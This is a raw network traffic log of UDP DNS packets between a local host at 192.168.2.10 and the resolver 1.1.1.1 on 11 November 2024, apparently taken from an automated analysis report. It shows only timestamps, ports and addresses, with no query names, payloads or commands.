                                                                                                                                                                                                            Nov 11, 2024 18:24:29.398977041 CET53542421.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.450467110 CET53501701.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.475507021 CET53514481.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.498473883 CET5439853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.533822060 CET6443453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.537703991 CET5683853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.537878036 CET5008653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.538043976 CET5606853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.542828083 CET53644341.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.549916029 CET53500861.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.556946993 CET53560681.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.689999104 CET5796553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.690747023 CET5541953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.691582918 CET5716553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.692934036 CET5732053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.694145918 CET5300853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.697880983 CET53579651.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.700841904 CET53554191.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.701288939 CET53573201.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.703248024 CET5881453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.703685999 CET5956253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.704186916 CET53530081.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.710870028 CET53588141.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.721549034 CET5124353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.722750902 CET53571651.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.727751017 CET6315453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.728121996 CET6537053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.732950926 CET53512431.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.736721039 CET53653701.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.739650011 CET53631541.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.755935907 CET53568381.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.792912960 CET5056053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.800977945 CET53505601.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.802239895 CET5415553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.802479029 CET5050153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.802581072 CET4934053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.809895039 CET6535253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.810909033 CET6203453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.812875032 CET6493353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.814166069 CET5201153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.821202993 CET53493401.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.827467918 CET6354753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.836296082 CET5465853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.840799093 CET53653521.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.842366934 CET53620341.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.844266891 CET53649331.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.845145941 CET53520111.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.931998968 CET6360453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.932085037 CET6294753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.933690071 CET6423153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.943121910 CET53629471.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.967415094 CET53642311.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.002856970 CET53505011.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.017436028 CET53541551.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.054663897 CET53635471.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.087069988 CET53546581.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.174948931 CET53636041.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.428297043 CET53543981.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:30.641140938 CET53595621.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.018100977 CET5084953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.019819021 CET4919953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.022578001 CET5255853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.023070097 CET5773853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.025095940 CET5248753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.025352955 CET5292153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.026664972 CET6477353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.027328014 CET6231653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.027954102 CET6232253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.029026031 CET53508491.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.029300928 CET5160653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.030136108 CET4989953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.030690908 CET6486653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.031188965 CET6414453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.031357050 CET53491991.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.031656981 CET5091553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.032268047 CET53525581.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.033529043 CET5117553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.034389973 CET5316253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.035085917 CET6241953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.035166025 CET53529211.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.035860062 CET53524871.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.036640882 CET5010953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.037343979 CET53498991.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.037355900 CET53647731.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.041079044 CET53509151.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.041093111 CET53641441.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.044362068 CET53624191.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.047272921 CET53511751.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.049529076 CET5201153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.054326057 CET53501091.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.054410934 CET53577381.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.058485985 CET53623221.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.059211969 CET53623161.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.062494993 CET53516061.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.066076994 CET53531621.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.079809904 CET53520111.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.081604958 CET6428953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.092117071 CET53642891.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.096437931 CET5451253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.097062111 CET5645153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.097208023 CET5549853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.107009888 CET53545121.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.107024908 CET53564511.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.109112978 CET53554981.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.110223055 CET6528153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.110476017 CET6287453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.114918947 CET6448153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.120996952 CET6171053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.121212959 CET5277453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.121212959 CET5867153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.121375084 CET5642653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.121572971 CET5011853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.121646881 CET5234053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.121768951 CET5857353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.121815920 CET5154153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.121979952 CET5773553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.122004032 CET6110353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.122137070 CET5443053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.122232914 CET6335653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.122349977 CET5238053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.122375011 CET53652811.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.125268936 CET53644811.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.128408909 CET53515411.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.129828930 CET53523801.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.130937099 CET53527741.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.131037951 CET53586711.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.131140947 CET53564261.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.131594896 CET53585731.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.131696939 CET53544301.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.133153915 CET53611031.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.135391951 CET4988253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.136482954 CET6155253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.136703968 CET6390553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.136887074 CET5727453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.137048006 CET5066853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.137207985 CET5583453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.137444019 CET5076753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.139664888 CET5876753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.139879942 CET5825953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.140053988 CET6129453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.140450954 CET5622753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.140656948 CET6408353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.140841007 CET5453353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.141026974 CET6317653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.141165018 CET6375153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.141307116 CET5854753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.141457081 CET6529253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.141596079 CET6121653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.142199039 CET53628741.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.145517111 CET53498821.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.146626949 CET53572741.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.146724939 CET53558341.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.146790981 CET53507671.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.147099972 CET53506681.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.148010969 CET53582591.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.149802923 CET53640831.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.149921894 CET53587671.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.150409937 CET5208153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.150588036 CET6470053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.150991917 CET53545331.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.151137114 CET53637511.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.151597977 CET53617101.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.151690006 CET6338753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.151912928 CET6011953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.152066946 CET6428353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.152105093 CET5198053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.152211905 CET53633561.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.152224064 CET53652921.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.152506113 CET53631761.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.152654886 CET53523401.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.153012991 CET5021553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.158490896 CET53612941.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.159302950 CET53519801.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.159332991 CET53562271.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.160274029 CET53585471.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.160717964 CET53502151.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.161056042 CET53633871.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.162412882 CET53642831.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.162538052 CET53520811.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.162549973 CET53601191.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.163708925 CET53647001.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.167922020 CET53639051.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.169775963 CET53615521.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.172183037 CET53612161.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.315819979 CET53501181.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.337265968 CET53577351.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:10.799722910 CET53648661.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:16.998486996 CET5749553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:16.998717070 CET5390853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:16.999821901 CET4987753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.002121925 CET6250053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.006978989 CET53498771.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.007819891 CET6192453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.007875919 CET53574951.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.008665085 CET5999053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.012741089 CET5771253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.019642115 CET53599901.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.021445990 CET5823553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.026546001 CET53625001.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.032186031 CET53582351.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.039138079 CET53619241.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.044717073 CET53577121.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.045924902 CET5321053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.048953056 CET5074453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.050997972 CET5263253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.051579952 CET5076753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.056159973 CET53507441.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.058343887 CET53532101.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.061405897 CET53507671.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.061413050 CET53526321.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.062500954 CET5157053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.074142933 CET53515701.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.085716009 CET6093153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.086219072 CET5626153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.096893072 CET53609311.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.097089052 CET5542753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.097141027 CET53562611.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.097523928 CET5986153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.099051952 CET6040953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.099971056 CET6447653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.100871086 CET5065753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.102935076 CET5597553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.103333950 CET5972653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.106138945 CET5004053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.106456041 CET5776853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.106992960 CET53554271.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.107441902 CET5650853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.107947111 CET6075253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.108340979 CET5352853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.109929085 CET5361453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.110202074 CET53604091.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.110853910 CET53506571.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.112447977 CET5461653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.112870932 CET53559751.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.112998962 CET6154653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.113352060 CET5922553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.114106894 CET4930853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.116961956 CET53577681.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.120963097 CET5193653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.121244907 CET5487053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.124156952 CET5792453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.125891924 CET5265553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.126101017 CET6354253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.129201889 CET5149553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.129405022 CET5963453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.129729033 CET6461953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.130438089 CET5505353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.130765915 CET5457453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.130964994 CET4927653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.131062031 CET5068553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.139609098 CET6367253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.139802933 CET6322853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.139982939 CET5251653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.140218973 CET6121653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.140619040 CET6301553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.140808105 CET5372153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.145772934 CET6094553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.146028996 CET5307453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.146028996 CET6227253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.146271944 CET5079853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.146450043 CET5300153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.146805048 CET6128253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.147512913 CET5066253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.147876024 CET5600453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.148066044 CET5373953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.148274899 CET5132853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.150913954 CET6285253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.151372910 CET6540153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.154041052 CET5614553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.154139996 CET5392053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.379077911 CET53565081.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.379097939 CET53535281.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.379110098 CET53536141.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.379134893 CET53644761.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.379190922 CET53597261.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.379225016 CET53607521.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.379409075 CET53539081.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.381617069 CET53632281.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.383512020 CET53636721.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.383599043 CET53579241.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.383754969 CET53646191.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.383790016 CET53612161.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.383809090 CET53596341.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.383873940 CET53548701.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.383927107 CET53545741.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.384300947 CET53526551.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.384469986 CET53493081.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:17.384562969 CET53550531.1.1.1192.168.2.10
